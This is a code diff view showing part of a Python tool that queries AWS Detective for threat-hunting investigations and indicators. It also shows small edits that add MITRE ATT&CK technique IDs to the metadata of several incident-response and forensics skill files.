print(f" Severity: {response.get('Severity', 'N/A')}")
|
||||
print(f" Status: {response.get('Status', 'N/A')}")
|
||||
print(f" Created: {response.get('CreatedTime', 'N/A')}")
|
||||
print(f" Scope Start: {response.get('ScopeStartTime', 'N/A')}")
|
||||
print(f" Scope End: {response.get('ScopeEndTime', 'N/A')}")
|
||||
|
||||
return response
|
||||
|
||||
|
||||
def list_indicators(session, graph_arn, investigation_id, max_results=50):
|
||||
"""List indicators for a specific investigation."""
|
||||
client = session.client('detective')
|
||||
|
||||
indicators = _collect_all_pages(
|
||||
client.list_indicators, 'Indicators',
|
||||
GraphArn=graph_arn,
|
||||
InvestigationId=investigation_id,
|
||||
MaxResults=max_results,
|
||||
)
|
||||
if not indicators:
|
||||
print("[+] No indicators found for this investigation")
|
||||
return []
|
||||
|
||||
print(f"[+] Found {len(indicators)} indicator(s)\n")
|
||||
for ind in indicators:
|
||||
ind_type = ind.get('IndicatorType', 'N/A')
|
||||
detail = ind.get('IndicatorDetail', {})
|
||||
print(f" Type: {ind_type}")
|
||||
if detail:
|
||||
print(f" Detail: {json.dumps(detail, default=str)[:200]}")
|
||||
print()
|
||||
|
||||
return indicators
|
||||
|
||||
|
||||
def export_results(data, output_dir):
|
||||
"""Export investigation results to JSON."""
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
out_path = os.path.join(output_dir, "detective_results.json")
|
||||
with open(out_path, "w") as f:
|
||||
json.dump(data, f, indent=2, default=str)
|
||||
print(f"[+] Results exported to {out_path}")
|
||||
return out_path
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
import argparse
|
||||
|
||||
parser = argparse.ArgumentParser(
|
||||
description="AWS Detective Threat Hunting Tool"
|
||||
)
|
||||
parser.add_argument(
|
||||
"--graphs", action="store_true", help="List behavior graphs"
|
||||
)
|
||||
parser.add_argument(
|
||||
"--investigations", action="store_true", help="List investigations"
|
||||
)
|
||||
parser.add_argument("--graph-arn", type=str, help="Behavior graph ARN")
|
||||
parser.add_argument(
|
||||
"--investigation-id", type=str, help="Investigation ID for detail view"
|
||||
)
|
||||
parser.add_argument(
|
||||
"--indicators", action="store_true", help="List indicators"
|
||||
)
|
||||
parser.add_argument(
|
||||
"--severity",
|
||||
type=str,
|
||||
default=None,
|
||||
choices=["INFORMATIONAL", "LOW", "MEDIUM", "HIGH", "CRITICAL"],
|
||||
help="Severity filter (e.g. HIGH)",
|
||||
)
|
||||
parser.add_argument("--max-results", type=int, default=20,
|
||||
help="Max results per API call (1-100)")
|
||||
parser.add_argument("--region", default="us-east-1")
|
||||
parser.add_argument("--profile", type=str, help="AWS profile name")
|
||||
parser.add_argument(
|
||||
"--output", type=str, help="Output directory for JSON export"
|
||||
)
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.max_results < 1 or args.max_results > 100:
|
||||
parser.error("--max-results must be between 1 and 100")
|
||||
|
||||
kwargs = {"region_name": args.region}
|
||||
if args.profile:
|
||||
kwargs["profile_name"] = args.profile
|
||||
session = boto3.Session(**kwargs)
|
||||
|
||||
results = {}
|
||||
|
||||
if args.graphs:
|
||||
results["graphs"] = list_behavior_graphs(session)
|
||||
|
||||
if args.investigations:
|
||||
if not args.graph_arn:
|
||||
print("[!] --graph-arn required for --investigations")
|
||||
sys.exit(1)
|
||||
results["investigations"] = list_investigations(
|
||||
session, args.graph_arn, args.severity, args.max_results
|
||||
)
|
||||
|
||||
if args.investigation_id:
|
||||
if not args.graph_arn:
|
||||
print("[!] --graph-arn required for --investigation-id")
|
||||
sys.exit(1)
|
||||
results["detail"] = get_investigation_detail(
|
||||
session, args.graph_arn, args.investigation_id
|
||||
)
|
||||
|
||||
if args.indicators:
|
||||
if not args.graph_arn or not args.investigation_id:
|
||||
print("[!] --graph-arn and --investigation-id required for --indicators")
|
||||
sys.exit(1)
|
||||
results["indicators"] = list_indicators(
|
||||
session, args.graph_arn, args.investigation_id, args.max_results
|
||||
)
|
||||
|
||||
if args.output and results:
|
||||
export_results(results, args.output)
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [disk-forensics, forensic-imaging, evidence-acquisition, file-recovery, chain-of-custody]
|
||||
mitre_attack: ["T1070", "T1027", "T1036", "T1564"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [insider-threat, user-behavior-analytics, data-exfiltration, privilege-misuse, DFIR]
|
||||
mitre_attack: ["T1078", "T1048", "T1567", "T1114"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Systematically investigate all persistence mechanisms on Windows an
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, malware-persistence, autoruns, registry, scheduled-tasks, rootkit-detection, incident-response]
|
||||
mitre_attack: ["T1547.001", "T1053.005", "T1543.003", "T1546.003", "T1574"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [ransomware, encryption-recovery, backup-restoration, ransom-negotiation, CISA-guidance]
|
||||
mitre_attack: ["T1486", "T1490", "T1489", "T1021", "T1570"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -8,6 +8,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: soc-operations
|
||||
tags: [soc, tabletop, exercise, incident-response, training, nist, playbook-validation]
|
||||
mitre_attack: ["T1566", "T1486", "T1078"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -4,6 +4,7 @@ description: Classify and prioritize security incidents using structured IR play
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [incident-response, triage, playbook, severity-classification, soc]
|
||||
mitre_attack: ["T1190", "T1566", "T1078"]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
@@ -10,6 +10,7 @@ description: >
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [incident-triage, NIST-800-61, SANS-PICERL, severity-classification, SOC-operations]
|
||||
mitre_attack: ["T1190", "T1566", "T1078", "T1059"]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: Apache-2.0
|
||||
|
||||
Reference in New Issue
Block a user